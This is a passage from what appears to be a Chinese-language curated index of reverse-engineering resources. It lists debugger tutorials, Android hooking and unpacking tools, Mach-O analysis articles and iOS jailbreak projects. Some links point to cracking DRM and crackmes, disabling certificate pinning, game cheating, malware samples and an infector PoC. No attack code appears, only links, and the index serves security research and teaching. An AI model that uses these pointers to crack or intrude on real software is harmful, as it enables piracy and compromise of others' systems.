- 2018.01 [KirbiflintCracking] [Cracking the new Steam Stub drm with x64dbg [Learning Cracking]](https://www.youtube.com/watch?v=yrrcL8xGPoE)
- 2018.01 [KirbiflintCracking] [Cracking a simple crackme & bypassing Anti-debugger protection with x64dbg [Learning Cracking]](https://www.youtube.com/watch?v=Sal3xbSJdJA)
- 2017.12 [KirbiflintCracking] [Cracking some Crackmes with x64dbg [Learning Cracking]](https://www.youtube.com/watch?v=E1zD4Lp7b1g)
- 2017.12 [KirbiflintCracking] [Cracking a simple Crackme with x64dbg [Learning cracking]](https://www.youtube.com/watch?v=MHw8Xu9Od_c)
- 2017.10 [x64dbg] [Limitations in x64dbg](https://x64dbg.com/blog/2017/10/06/Limitations-in-x64dbg.html)
- 2017.09 [pediy] [[翻译]消息断点在x64dbg中的应用 by lantie@15PB](https://bbs.pediy.com/thread-221551.htm)
- 2017.07 [pediy] [[原创]使用x64dbg+VS2015 Spy++去除WinRAR5.40(64位)广告弹框](https://bbs.pediy.com/thread-219435.htm)
- 2017.06 [seowhistleblower] [Channel Update + Let's Hack: Sniper Elite 4 (Cheat Engine and x64dbg Tutorial)](https://www.youtube.com/watch?v=KCHsOmebYo4)
- 2016.10 [x64dbg] [Architecture of x64dbg](https://x64dbg.com/blog/2016/10/04/architecture-of-x64dbg.html)
- 2016.07 [x64dbg] [x64dbg plugin SDK](https://x64dbg.com/blog/2016/07/30/x64dbg-plugin-sdk.html)
- 2016.07 [adelmas] [Introducing x64dbg and Pizzacrypts Ransomware Unpacking](http://adelmas.com/blog/x64dbg_pizzacrypts.php)
- 2015.12 [pediy] [[原创]源码编译x64dbg](https://bbs.pediy.com/thread-206431.htm)
- 2015.10 [pediy] [[原创]win7X64DBGPORT移位数据](https://bbs.pediy.com/thread-205123.htm)
# <a id="37e37e665eac00de3f55a13dcfd47320"></a>OllyDbg
***
## <a id="7834e399e48e6c64255a1a0fdb6b88f5"></a>插件&&脚本
### <a id="92c44f98ff5ad8f8b0f5e10367262f9b"></a>新添加的
***
## <a id="8dd3e63c4e1811973288ea8f1581dfdb"></a>文章&&视频
- 2019.04 [freebuf] [缓冲区溢出实战教程系列(三):利用OllyDbg了解程序运行机制](https://www.freebuf.com/articles/system/198149.html)
- 2018.10 [pediy] [[原创]使用“PE文件加区段工具”、“LordPE”、“WinHex”、“OllyDbg”为PE文件添加section、dll(API)](https://bbs.pediy.com/thread-247370.htm)
- 2018.10 [pediy] [[原创]Ollydbg插件的编写流程](https://bbs.pediy.com/thread-247331.htm)
- 2018.03 [pediy] [[原创]业余时间开发的类IDA静态反汇编工具(仿Ollydbg界面)(内有传送门)](https://bbs.pediy.com/thread-225396.htm)
- 2018.01 [kienbigmummy] [OllyDbg_tut32](https://medium.com/p/345972799c44)
- 2018.01 [pediy] [如何实现自己的ollydbg调试器 (1) 界面的实现](https://bbs.pediy.com/thread-224157.htm)
- 2017.12 [hackers] [Reverse Engineering Malware, Part 5: OllyDbg Basics](https://www.hackers-arise.com/single-post/2017/10/03/Reverse-Engineering-Malware-Part-5-OllyDbg-Basics)
- 2017.10 [4hou] [工具推荐:逆向破解利器OllyDbg](http://www.4hou.com/tools/7890.html)
- 2017.07 [ColinHardy] [Three and a half ways to unpack malware using Ollydbg](https://www.youtube.com/watch?v=n_gxtaFX8Ao)
- 2016.12 [360] [利用OllyDbg跟踪分析Process Hollowing](https://www.anquanke.com/post/id/85124/)
- 2016.12 [airbuscybersecurity] [Following Process Hollowing in OllyDbg](http://blog.airbuscybersecurity.com/post/2016/06/Following-Process-Hollowing-in-OllyDbg)
- 2015.11 [pediy] [[原创][开源]OllyDbg 2.x插件编写教程](https://bbs.pediy.com/thread-206175.htm)
- 2015.11 [pediy] [[原创]科普文之如何编写ollydbg插件](https://bbs.pediy.com/thread-206064.htm)
- 2015.11 [pediy] [[翻译]Ollydbg2.0X版本帮助手册中文翻译](https://bbs.pediy.com/thread-205870.htm)
- 2015.08 [pediy] [[原创]《使用OllyDbg从零开始Cracking》第14课练习完整解答](https://bbs.pediy.com/thread-203152.htm)
- 2015.01 [pediy] [[翻译]使用OllyDbg从零开始Cracking 第五十八章-EXECryptor v2.2.50.h脱壳](https://bbs.pediy.com/thread-196797.htm)
- 2014.11 [reversec0de] [OllyDbg Plugin Converter v0.1b](https://reversec0de.wordpress.com/2014/11/09/ollydbg-plugin-converter-v0-1b/)
- 2014.10 [pediy] [[翻译]使用OllyDbg从零开始Cracking 第四十四章-ACProtect V1.09脱壳(修复AntiDump)](https://bbs.pediy.com/thread-193537.htm)
- 2014.10 [pediy] [[翻译]使用OllyDbg从零开始Cracking 第四十三章-ACProtect V1.09脱壳(编写脚本修复IAT)](https://bbs.pediy.com/thread-193467.htm)
- 2014.10 [pediy] [使用OllyDbg从零开始Cracking 第四十二章-ACProtect V1.09脱壳(寻找OEP,绕过硬件断点的检测,修复Stolen code)](https://bbs.pediy.com/thread-193405.htm)
# <a id="0a506e6fb2252626add375f884c9095e"></a>WinDBG
***
## <a id="37eea2c2e8885eb435987ccf3f467122"></a>插件&&脚本
### <a id="2ef75ae7852daa9862b2217dca252cc3"></a>新添加的
- [**564**星][6m] [C#] [fremag/memoscope.net](https://github.com/fremag/memoscope.net) Dump and analyze .Net applications memory ( a gui for WinDbg and ClrMd )
- [**279**星][1m] [Py] [hugsy/defcon_27_windbg_workshop](https://github.com/hugsy/defcon_27_windbg_workshop) DEFCON 27 workshop - Modern Debugging with WinDbg Preview
- [**230**星][9m] [C++] [microsoft/windbg-samples](https://github.com/microsoft/windbg-samples) Sample extensions, scripts, and API uses for WinDbg.
***
## <a id="6d8bac8bfb5cda00c7e3bd38d64cbce3"></a>文章&&视频
- 2019.10 [freebuf] [Iris:一款可执行常见Windows漏洞利用检测的WinDbg扩展](https://www.freebuf.com/sectool/214276.html)
- 2019.08 [lowleveldesign] [Synthetic types and tracing syscalls in WinDbg](https://lowleveldesign.org/2019/08/27/synthetic-types-and-tracing-syscalls-in-windbg/)
- 2019.08 [benoit] [Portable WinDbg](https://medium.com/p/c0087e320ddc)
- 2019.07 [osr] [How L1 Terminal Fault (L1TF) Mitigation and WinDbg Wasted My Morning (a.k.a. Yak Shaving: WinDbg Edition)](https://www.osr.com/blog/2019/07/02/how-l1-terminal-fault-l1tf-mitigation-and-windbg-wasted-my-morning-a-k-a-yak-shaving-windbg-edition/)
- 2019.06 [360] [《Dive into Windbg系列》Explorer无法启动排查](https://www.anquanke.com/post/id/179748/)
- 2019.05 [nul] [一个Windbg/cdb极其缓慢的例子](http://www.nul.pw/2019/05/21/281.html)
- 2019.04 [360] [《Dive into Windbg系列》AudioSrv音频服务故障](https://www.anquanke.com/post/id/176343/)
- 2019.04 [freebuf] [如何为WinDbg编写ClrMD插件](https://www.freebuf.com/articles/network/198951.html)
- 2019.03 [aliyun] [为WinDbg和LLDB编写ClrMD扩展](https://xz.aliyun.com/t/4459)
- 2019.03 [offensive] [Development of a new Windows 10 KASLR Bypass (in One WinDBG Command)](https://www.offensive-security.com/vulndev/development-of-a-new-windows-10-kaslr-bypass-in-one-windbg-command/)
- 2019.02 [OALabs] [WinDbg Basics for Malware Analysis](https://www.youtube.com/watch?v=QuFJpH3My7A)
- 2019.01 [TheSourceLens] [Windows Internals - Processes Part 6 of 20 - Process related windbg commands.](https://www.youtube.com/watch?v=Hg0xcpBc6R4)
- 2019.01 [TheSourceLens] [Introduction to Windbg Series 1 Part 23 - Time travellers tracing ( IDNA )](https://www.youtube.com/watch?v=Is8mZ5kklfw)
- 2018.09 [pediy] [[原创] 《软件调试》分页机制windbg例子分析(各种填坑)](https://bbs.pediy.com/thread-246768.htm)
- 2018.08 [pediy] [[翻译]WinDbg内核调试配置方法介绍](https://bbs.pediy.com/thread-246228.htm)
- 2018.06 [pediy] [[原创]让Windbg在驱动入口前断下来](https://bbs.pediy.com/thread-228575.htm)
- 2018.05 [criteo] [Extending the new WinDbg, Part 3 – Embedding a C# interpreter](http://labs.criteo.com/2018/05/extending-new-windbg-part-3-embedding-c-interpreter/)
- 2018.04 [whereisk0shl] [Windbg logviewer.exe缓冲区溢出漏洞](http://whereisk0shl.top/post/2018-04-26)
- 2018.04 [nettitude] [WinDbg: using pykd to dump private symbols](https://labs.nettitude.com/blog/windbg-using-pykd-to-dump-private-symbols/)
- 2018.02 [comae] [YARA scans in WinDbg](https://medium.com/p/b98851bf599b)
# <a id="11a59671b467a8cdbdd4ea9d5e5d9b51"></a>Android
***
## <a id="2110ded2aa5637fa933cc674bc33bf21"></a>工具
### <a id="63fd2c592145914e99f837cecdc5a67c"></a>新添加的1
- [**6101**星][3m] [Java] [google/android-classyshark](https://github.com/google/android-classyshark) 分析基于Android/Java的App或游戏
- [**6094**星][5m] [Java] [qihoo360/replugin](https://github.com/qihoo360/replugin) RePlugin - A flexible, stable, easy-to-use Android Plug-in Framework
- [**5195**星][19d] [Py] [mobsf/mobile-security-framework-mobsf](https://github.com/MobSF/Mobile-Security-Framework-MobSF) Mobile Security Framework (MobSF) is an automated, all-in-one mobile application (Android/iOS/Windows) pen-testing, malware analysis and security assessment framework capable of performing static and dynamic analysis.
- [**5084**星][15d] [HTML] [owasp/owasp-mstg](https://github.com/owasp/owasp-mstg) 关于移动App安全开发、测试和逆向的相近手册
- [**4882**星][24d] [Java] [guardianproject/haven](https://github.com/guardianproject/haven) 通过Android应用和设备上的传感器保护自己的个人空间和财产而又不损害
- [**4776**星][12d] [C++] [facebook/redex](https://github.com/facebook/redex) Android App字节码优化器
- [**4306**星][15d] [Shell] [ashishb/android-security-awesome](https://github.com/ashishb/android-security-awesome) A collection of android security related resources
- [**3649**星][2m] [C++] [anbox/anbox](https://github.com/anbox/anbox) 在常规GNU / Linux系统上引导完整的Android系统,基于容器
- [**2314**星][1y] [Java] [csploit/android](https://github.com/csploit/android) cSploit - The most complete and advanced IT security professional toolkit on Android.
- [**2120**星][9m] [Py] [linkedin/qark](https://github.com/linkedin/qark) 查找Android App的漏洞, 支持源码或APK文件
- [**2095**星][10m] [jermic/android-crack-tool](https://github.com/jermic/android-crack-tool)
- [**2051**星][21d] [Py] [sensepost/objection](https://github.com/sensepost/objection) runtimemobile exploration
- [**2011**星][8m] [Py] [fsecurelabs/drozer](https://github.com/FSecureLABS/drozer) The Leading Security Assessment Framework for Android.
- [**1976**星][9d] [Java] [kyson/androidgodeye](https://github.com/kyson/androidgodeye) AndroidGodEye:A performance monitor tool , like "Android Studio profiler" for Android , you can easily monitor the performance of your app real time in pc browser
- [**1925**星][7m] [Java] [fuzion24/justtrustme](https://github.com/fuzion24/justtrustme) An xposed module that disables SSL certificate checking for the purposes of auditing an app with cert pinning
- [**1430**星][11m] [Java] [aslody/legend](https://github.com/aslody/legend) (Android)无需Root即可Hook Java方法的框架, 支持Dalvik和Art环境
- [**1417**星][1m] [Java] [chrisk44/hijacker](https://github.com/chrisk44/hijacker) Aircrack, Airodump, Aireplay, MDK3 and Reaver GUI Application for Android
- [**1241**星][3m] [Java] [whataa/pandora](https://github.com/whataa/pandora) an android library for debugging what we care about directly in app.
- [**1235**星][2m] [Java] [find-sec-bugs/find-sec-bugs](https://github.com/find-sec-bugs/find-sec-bugs) The SpotBugs plugin for security audits of Java web applications and Android applications. (Also work with Kotlin, Groovy and Scala projects)
- [**1213**星][2m] [JS] [megatronking/httpcanary](https://github.com/megatronking/httpcanary) A powerful capture and injection tool for the Android platform
- [**1208**星][4m] [Java] [javiersantos/piracychecker](https://github.com/javiersantos/piracychecker) An Android library that prevents your app from being pirated / cracked using Google Play Licensing (LVL), APK signature protection and more. API 14+ required.
- [**1134**星][1m] [Java] [huangyz0918/androidwm](https://github.com/huangyz0918/androidwm) 一个支持不可见数字水印(隐写术)的android图像水印库。
- [**885**星][2m] [C] [504ensicslabs/lime](https://github.com/504ensicslabs/lime) LiME (formerly DMD) is a Loadable Kernel Module (LKM), which allows the acquisition of volatile memory from Linux and Linux-based devices, such as those powered by Android. The tool supports acquiring memory either to the file system of the device or over the network. LiME is unique in that it is the first tool that allows full memory captures f…
- [**820**星][11d] [proxymanapp/proxyman](https://github.com/proxymanapp/proxyman) Modern and Delightful HTTP Debugging Proxy for macOS, iOS and Android
- [**810**星][4m] [Scala] [antox/antox](https://github.com/antox/antox) Android client for Project Tox - Secure Peer to Peer Messaging
- [**800**星][3m] [sh4hin/androl4b](https://github.com/sh4hin/androl4b) 用于评估Android应用程序,逆向工程和恶意软件分析的虚拟机
- [**769**星][1y] [C] [ele7enxxh/android-inline-hook](https://github.com/ele7enxxh/android-inline-hook) thumb16 thumb32 arm32 inlineHook in Android
- [**668**星][2m] [doridori/android-security-reference](https://github.com/doridori/android-security-reference) A W.I.P Android Security Ref
- [**608**星][7m] [JS] [vincentcox/stacoan](https://github.com/vincentcox/stacoan) StaCoAn is a crossplatform tool which aids developers, bugbounty hunters and ethical hackers performing static code analysis on mobile applications.
- [**559**星][14d] [Shell] [owasp/owasp-masvs](https://github.com/owasp/owasp-masvs) OWASP 移动App安全标准
- [**546**星][2m] [nordicsemiconductor/android-nrf-connect](https://github.com/nordicsemiconductor/android-nrf-connect) Documentation and issue tracker for nRF Connect for Android.
- [**541**星][1y] [Java] [jaredrummler/apkparser](https://github.com/jaredrummler/apkparser) APK parser for Android
- [**527**星][4m] [JS] [wooyundota/droidsslunpinning](https://github.com/wooyundota/droidsslunpinning) Android certificate pinning disable tools
- [**518**星][4m] [Java] [megatronking/stringfog](https://github.com/megatronking/stringfog) 一款自动对字节码中的字符串进行加密Android插件工具
- [**511**星][9d] [Java] [happylishang/cacheemulatorchecker](https://github.com/happylishang/cacheemulatorchecker) Android模拟器检测,检测Android模拟器 ,获取相对真实的IMEI AndroidId 序列号 MAC地址等,作为DeviceID,应对防刷需求等
- [**482**星][2m] [JS] [lyxhh/lxhtoolhttpdecrypt](https://github.com/lyxhh/lxhtoolhttpdecrypt) Simple Android/iOS protocol analysis and utilization tool
- [**450**星][12m] [Kotlin] [shadowsocks/kcptun-android](https://github.com/shadowsocks/kcptun-android) kcptun for Android.
- [**443**星][1m] [TS] [shroudedcode/apk-mitm](https://github.com/shroudedcode/apk-mitm)
- [**431**星][13d] [C] [guardianproject/orbot](https://github.com/guardianproject/orbot) The Github home of Orbot: Tor on Android (Also available on gitlab!)
- [**426**星][19d] [Py] [thehackingsage/hacktronian](https://github.com/thehackingsage/hacktronian) All in One Hacking Tool for Linux & Android
- [**412**星][4m] [Java] [megatronking/netbare](https://github.com/megatronking/netbare) Net packets capture & injection library designed for Android
- [**409**星][3m] [CSS] [angea/pocorgtfo](https://github.com/angea/pocorgtfo) a "Proof of Concept or GTFO" mirror with extra article index, direct links and clean PDFs.
- [**408**星][1y] [Java] [testwhat/smaliex](https://github.com/testwhat/smaliex) A wrapper to get de-optimized dex from odex/oat/vdex.
- [**379**星][6m] [Makefile] [crifan/android_app_security_crack](https://github.com/crifan/android_app_security_crack) 安卓应用的安全和破解
- [**379**星][1y] [CSS] [nowsecure/secure-mobile-development](https://github.com/nowsecure/secure-mobile-development) A Collection of Secure Mobile Development Best Practices
- [**358**星][5m] [b3nac/android-reports-and-resources](https://github.com/b3nac/android-reports-and-resources) A big list of Android Hackerone disclosed reports and other resources.
- [**358**星][5m] [C] [the-cracker-technology/andrax-mobile-pentest](https://github.com/the-cracker-technology/andrax-mobile-pentest) ANDRAX The first and unique Penetration Testing platform for Android smartphones
- [**333**星][25d] [Java] [datatheorem/trustkit-android](https://github.com/datatheorem/trustkit-android) Easy SSL pinning validation and reporting for Android.
- [**284**星][9m] [Py] [micropyramid/forex-python](https://github.com/micropyramid/forex-python) Foreign exchange rates, Bitcoin price index and currency conversion using ratesapi.io
- [**267**星][4m] [Py] [amimo/dcc](https://github.com/amimo/dcc) DCC (Dex-to-C Compiler) is method-based aot compiler that can translate DEX code to C code.
- [**265**星][11d] [Py] [den4uk/andriller](https://github.com/den4uk/andriller) a collection of forensic tools for smartphones
- [**251**星][10m] [C] [chef-koch/android-vulnerabilities-overview](https://github.com/chef-koch/android-vulnerabilities-overview) An small overview of known Android vulnerabilities
- [**234**星][3m] [C] [grant-h/qu1ckr00t](https://github.com/grant-h/qu1ckr00t) A PoC application demonstrating the power of an Android kernel arbitrary R/W.
- [**234**星][1y] [Ruby] [hahwul/droid-hunter](https://github.com/hahwul/droid-hunter) (deprecated) Android application vulnerability analysis and Android pentest tool
- [**229**星][8m] [Java] [jieyushi/luffy](https://github.com/jieyushi/luffy) Android字节码插件,编译期间动态修改代码,改造添加全埋点日志采集功能模块,对常见控件进行监听处理
- [**225**星][3m] [Java] [virb3/trustmealready](https://github.com/virb3/trustmealready) Disable SSL verification and pinning on Android, system-wide
- [**208**星][26d] [C] [derrekr/fastboot3ds](https://github.com/derrekr/fastboot3ds) A homebrew bootloader for the Nintendo 3DS that is similar to android's fastboot.
### <a id="883a4e0dd67c6482d28a7a14228cd942"></a>新添加的
### <a id="fa49f65b8d3c71b36c6924ce51c2ca0c"></a>HotFix
- [**14557**星][13d] [Java] [tencent/tinker](https://github.com/tencent/tinker) Tinker is a hot-fix solution library for Android, it supports dex, library and resources update without reinstall apk.
- [**3462**星][27d] [Java] [meituan-dianping/robust](https://github.com/meituan-dianping/robust) Robust is an Android HotFix solution with high compatibility and high stability. Robust can fix bugs immediately without a reboot.
- [**1117**星][6m] [Java] [manbanggroup/phantom](https://github.com/manbanggroup/phantom) 唯一零 Hook 稳定占坑类 Android 热更新插件化方案
### <a id="ec395c8f974c75963d88a9829af12a90"></a>打包
- [**5080**星][2m] [Java] [meituan-dianping/walle](https://github.com/meituan-dianping/walle) Android Signature V2 Scheme签名下的新一代渠道包打包神器
### <a id="767078c52aca04c452c095f49ad73956"></a>收集
### <a id="17408290519e1ca7745233afea62c43c"></a>各类App
- [**12285**星][11d] [Java] [signalapp/signal-android](https://github.com/signalapp/Signal-Android) A private messenger for Android.
### <a id="7f353b27e45b5de6b0e6ac472b02cbf1"></a>Xposed
- [**8756**星][2m] [Java] [android-hacker/virtualxposed](https://github.com/android-hacker/virtualxposed) A simple app to use Xposed without root, unlock the bootloader or modify system image, etc.
- [**2559**星][7m] [taichi-framework/taichi](https://github.com/taichi-framework/taichi) A framework to use Xposed module with or without Root/Unlock bootloader, supportting Android 5.0 ~ 10.0
- [**2034**星][12d] [Java] [elderdrivers/edxposed](https://github.com/elderdrivers/edxposed) Elder driver Xposed Framework.
- [**1726**星][1y] [Java] [ac-pm/inspeckage](https://github.com/ac-pm/inspeckage) Android Package Inspector - dynamic analysis with api hooks, start unexported activities and more. (Xposed Module)
- [**1655**星][2m] [Java] [tiann/epic](https://github.com/tiann/epic) Dynamic java method AOP hook for Android(continution of Dexposed on ART), Supporting 4.0~10.0
- [**1296**星][2m] [Java] [android-hacker/exposed](https://github.com/android-hacker/exposed) A library to use Xposed without root or recovery(or modify system image etc..).
- [**790**星][8m] [Java] [blankeer/mdwechat](https://github.com/blankeer/mdwechat) 一个能让微信 Material Design 化的 Xposed 模块
- [**669**星][12d] [Java] [ganyao114/sandhook](https://github.com/ganyao114/sandhook) Android ART Hook/Native Inline Hook/Single Instruction Hook - support 4.4 - 10.0 32/64 bit - Xposed API Compat
- [**478**星][2m] [Java] [tornaco/x-apm](https://github.com/tornaco/x-apm) 应用管理 Xposed
- [**322**星][1y] [C] [smartdone/dexdump](https://github.com/smartdone/dexdump) 一个用来快速脱一代壳的工具(稍微改下就可以脱类抽取那种壳)(Android)
- [**309**星][1m] [bigsinger/androididchanger](https://github.com/bigsinger/androididchanger) Xposed Module for Changing Android Device Info
- [**309**星][13d] [Java] [ganyao114/sandvxposed](https://github.com/ganyao114/sandvxposed) Xposed environment without root (OS 5.0 - 10.0)
- [**204**星][1y] [C] [gtoad/android_inline_hook](https://github.com/gtoad/android_inline_hook) Build an so file to automatically do the android_native_hook work. Supports thumb-2/arm32 and ARM64 ! With this, tools like Xposed can do android native hook.
### <a id="50f63dce18786069de2ec637630ff167"></a>加壳&&脱壳
- [**1793**星][8m] [C++] [wrbug/dumpdex](https://github.com/wrbug/dumpdex) Android脱壳
- [**1465**星][3m] [C++] [vaibhavpandeyvpz/apkstudio](https://github.com/vaibhavpandeyvpz/apkstudio) Open-source, cross platform Qt based IDE for reverse-engineering Android application packages.
- [**811**星][4m] [C] [strazzere/android-unpacker](https://github.com/strazzere/android-unpacker) Android Unpacker presented at Defcon 22: Android Hacker Protection Level 0
- [**712**星][2m] [YARA] [rednaga/apkid](https://github.com/rednaga/apkid) Android Application Identifier for Packers, Protectors, Obfuscators and Oddities - PEiD for Android
- [**366**星][3m] [Java] [patrickfav/uber-apk-signer](https://github.com/patrickfav/uber-apk-signer) A cli tool that helps signing and zip aligning single or multiple Android application packages (APKs) with either debug or provided release certificates. It supports v1, v2 and v3 Android signing scheme has an embedded debug keystore and auto verifies after signing.
- [**322**星][6m] [Shell] [1n3/reverseapk](https://github.com/1n3/reverseapk) Quickly analyze and reverse engineer Android packages
### <a id="596b6cf8fd36bc4c819335f12850a915"></a>HOOK
- [**1500**星][27d] [C] [iqiyi/xhook](https://github.com/iqiyi/xhook) a PLT (Procedure Linkage Table) hook library for Android native ELF
- [**1494**星][9d] [C++] [jmpews/dobby](https://github.com/jmpews/Dobby) a lightweight, multi-platform, multi-architecture hook framework.
- [**804**星][25d] [C++] [aslody/whale](https://github.com/aslody/whale) Hook Framework for Android/IOS/Linux/MacOS
- [**530**星][7m] [Java] [aslody/andhook](https://github.com/asLody/AndHook) Android dynamic instrumentation framework
- [**361**星][8m] [C] [turing-technician/fasthook](https://github.com/turing-technician/fasthook) Android ART Hook
### <a id="5afa336e229e4c38ad378644c484734a"></a>Emulator&&模拟器
- [**1492**星][1y] [C++] [f1xpl/openauto](https://github.com/f1xpl/openauto) AndroidAuto headunit emulator
- [**532**星][7m] [Java] [limboemu/limbo](https://github.com/limboemu/limbo) Limbo is a QEMU-based emulator for Android. It currently supports PC & ARM emulation for Intel x86 and ARM architecture. See our wiki
- [**471**星][3m] [Java] [strazzere/anti-emulator](https://github.com/strazzere/anti-emulator) Android Anti-Emulator
### <a id="0a668d220ce74e11ed2738c4e3ae3c9e"></a>IDA
### <a id="bb9f8e636857320abf0502c19af6c763"></a>Debug&&调试
- [**10794**星][1m] [Java] [konloch/bytecode-viewer](https://github.com/konloch/bytecode-viewer) A Java 8+ Jar & Android APK Reverse Engineering Suite (Decompiler, Editor, Debugger & More)
- [**6762**星][10m] [Java] [amitshekhariitbhu/android-debug-database](https://github.com/amitshekhariitbhu/android-debug-database) A library for debugging android databases and shared preferences - Make Debugging Great Again
### <a id="f975a85510f714ec3cc2551e868e75b8"></a>Malware&&恶意代码
- [**429**星][4m] [Shell] [ashishb/android-malware](https://github.com/ashishb/android-malware) Collection of android malware samples
- [**347**星][3m] [Java] [droidefense/engine](https://github.com/droidefense/engine) Droidefense: Advance Android Malware Analysis Framework
### <a id="1d83ca6d8b02950be10ac8e4b8a2d976"></a>Obfuscate&&混淆
- [**3078**星][2m] [Java] [calebfenton/simplify](https://github.com/calebfenton/simplify) Generic Android Deobfuscator
- [**294**星][4m] [C] [shadowsocks/simple-obfs-android](https://github.com/shadowsocks/simple-obfs-android) A simple obfuscating tool for Android
### <a id="6d2b758b3269bac7d69a2d2c8b45194c"></a>ReverseEngineering
- [**9285**星][1m] [Java] [ibotpeaches/apktool](https://github.com/ibotpeaches/apktool) A tool for reverse engineering Android apk files
- [**2053**星][1m] [Java] [genymobile/gnirehtet](https://github.com/genymobile/gnirehtet) Gnirehtet provides reverse tethering for Android
- [**585**星][3m] [C++] [secrary/andromeda](https://github.com/secrary/andromeda) Andromeda - Interactive Reverse Engineering Tool for Android Applications [This project is not maintained anymore]
- [**545**星][20d] [maddiestone/androidappre](https://github.com/maddiestone/androidappre) Android App Reverse Engineering Workshop
- [**267**星][10m] [Dockerfile] [cryptax/androidre](https://github.com/cryptax/androidre) 用于Android 逆向的 Docker 容器
- [**246**星][28d] [C++] [strazzere/android-scripts](https://github.com/strazzere/android-scripts) Android逆向脚本收集
- 重复区段: [IDA->插件->Android](#66052f824f5054aa0f70785a2389a478) |
***
## <a id="f0493b259e1169b5ddd269b13cfd30e6"></a>文章&&视频
- 2019.12 [aliyun] [Android智能终端系统的安全加固(上)](https://xz.aliyun.com/t/6852)
- 2019.11 [venus] [Android勒索病毒分析(上)](https://paper.seebug.org/1085/)
# <a id="069664f347ae73b1370c4f5a2ec9da9f"></a>Apple&&iOS&&iXxx
***
## <a id="830f40713cef05f0665180d840d56f45"></a>Mach-O
### <a id="9b0f5682dc818c93c4de3f46fc3f43d0"></a>工具
- [**2540**星][10m] [ObjC] [nygard/class-dump](https://github.com/nygard/class-dump) Generate Objective-C headers from Mach-O files.
- [**2140**星][2m] [Py] [jonathansalwan/ropgadget](https://github.com/jonathansalwan/ropgadget) This tool lets you search your gadgets on your binaries to facilitate your ROP exploitation. ROPgadget supports ELF, PE and Mach-O format on x86, x64, ARM, ARM64, PowerPC, SPARC and MIPS architectures.
- [**399**星][2m] [Logos] [limneos/classdump-dyld](https://github.com/limneos/classdump-dyld) Class-dump any Mach-o file without extracting it from dyld_shared_cache
- [**265**星][8m] [ObjC] [devaukz/macho-kit](https://github.com/devaukz/macho-kit) A C/Objective-C library for parsing Mach-O files.
### <a id="750700dcc62fbd83e659226db595b5cc"></a>文章
- 2017.11 [pnfsoftware] [Having Fun with Obfuscated Mach-O Files](https://www.pnfsoftware.com/blog/having-fun-with-obfuscated-mach-o-files/)
- 2017.03 [lse] [Playing with Mach-O binaries and dyld](https://blog.lse.epita.fr:443/articles/82-playing-with-mach-os-and-dyld.html)
- 2017.03 [lse] [Playing with Mach-O binaries and dyld](https://blog.lse.epita.fr/articles/82-playing-with-mach-os-and-dyld.html)
- 2017.02 [venus] [Mach-O 脱壳技巧一则](https://paper.seebug.org/202/)
- 2016.05 [turingh] [nlist-Mach-O文件重定向信息数据结构分析](http://turingh.github.io/2016/05/24/nlist-Mach-O%E6%96%87%E4%BB%B6%E9%87%8D%E5%AE%9A%E5%90%91%E4%BF%A1%E6%81%AF%E6%95%B0%E6%8D%AE%E7%BB%93%E6%9E%84%E5%88%86%E6%9E%90/)
- 2016.05 [pediy] [[原创]初探Mach-O学习小记(附源码)](https://bbs.pediy.com/thread-209957.htm)
- 2016.03 [turingh] [OSX内核加载mach-o流程分析](http://turingh.github.io/2016/03/30/OSX%E5%86%85%E6%A0%B8%E5%8A%A0%E8%BD%BDmach-o%E6%B5%81%E7%A8%8B%E5%88%86%E6%9E%90/)
- 2016.03 [pediy] [[原创]Mach-O动态连接的简单分析(延时绑定)](https://bbs.pediy.com/thread-208455.htm)
- 2016.03 [turingh] [Mach-O的动态链接相关知识](http://turingh.github.io/2016/03/10/Mach-O%E7%9A%84%E5%8A%A8%E6%80%81%E9%93%BE%E6%8E%A5/)
- 2016.03 [pediy] [[原创]Mach-O格式分析](https://bbs.pediy.com/thread-208357.htm)
- 2016.03 [turingh] [mach-o格式分析](http://turingh.github.io/2016/03/07/mach-o%E6%96%87%E4%BB%B6%E6%A0%BC%E5%BC%8F%E5%88%86%E6%9E%90/)
- 2016.03 [pediy] [[原创]dyld加载mach-o文件分析](https://bbs.pediy.com/thread-208255.htm)
- 2016.03 [turingh] [dyld中mach-o文件加载的简单分析](http://turingh.github.io/2016/03/01/dyld%E4%B8%ADmacho%E5%8A%A0%E8%BD%BD%E7%9A%84%E7%AE%80%E5%8D%95%E5%88%86%E6%9E%90/)
- 2014.09 [pediy] [[原创]mach-o文件格式学习记录](https://bbs.pediy.com/thread-192657.htm)
- 2014.09 [cerbero] [Stripping symbols from a Mach-O](http://cerbero-blog.com/?p=1483)
- 2014.08 [secureallthethings] [Patching the Mach-o Format the Simple and Easy Way](http://secureallthethings.blogspot.com/2014/08/patching-mach-o-format-simple-and-easy.html)
- 2013.06 [cerbero] [Mach-O support (including Universal Binaries and Apple Code Signatures)](http://cerbero-blog.com/?p=1139)
- 2013.05 [volatility] [MoVP II - 1.1 - Mach-O Address Space](https://volatility-labs.blogspot.com/2013/05/movp-ii-11-mach-o-address-space.html)
- 2013.03 [reverse] [OS.X/Boubou – Mach-O infector PoC source code](https://reverse.put.as/2013/03/05/os-xboubou-mach-o-infector-poc-source-code/)
- 2012.02 [reverse] [A little more fun with Mach-O headers: adding and spoofing a constructor](https://reverse.put.as/2012/02/06/a-little-more-fun-with-mach-o-headers-adding-and-spoofing-a-constructor/)
***
## <a id="bba00652bff1672ab1012abd35ac9968"></a>越狱
### <a id="ff19d5d94315d035bbcb3ef0c348c75b"></a>工具
- [**5451**星][3m] [Py] [axi0mx/ipwndfu](https://github.com/axi0mx/ipwndfu) open-source jailbreaking tool for many iOS devices
- [**5390**星][6m] [C] [pwn20wndstuff/undecimus](https://github.com/pwn20wndstuff/undecimus) unc0ver jailbreak for iOS 11.0 - 12.4
- [**4248**星][8m] [ObjC] [alonemonkey/monkeydev](https://github.com/alonemonkey/monkeydev) CaptainHook Tweak、Logos Tweak and Command-line Tool、Patch iOS Apps, Without Jailbreak.
- [**3221**星][5m] [ObjC] [naituw/ipapatch](https://github.com/naituw/ipapatch) Patch iOS Apps, The Easy Way, Without Jailbreak.
- [**1193**星][15d] [JS] [alonemonkey/frida-ios-dump](https://github.com/alonemonkey/frida-ios-dump) pull decrypted ipa from jailbreak device
- 重复区段: [DBI->Frida->工具->新添加的](#54836a155de0c15b56f43634cd9cfecf) |
- [**404**星][1y] [C] [coalfire-research/ios-11.1.2-15b202-jailbreak](https://github.com/coalfire-research/ios-11.1.2-15b202-jailbreak) iOS 11.1.2 (15B202) Jailbreak
- [**287**星][7m] [Shell] [0ki/mikrotik-tools](https://github.com/0ki/mikrotik-tools) Tools for Mikrotik devices - universal jailbreak tool
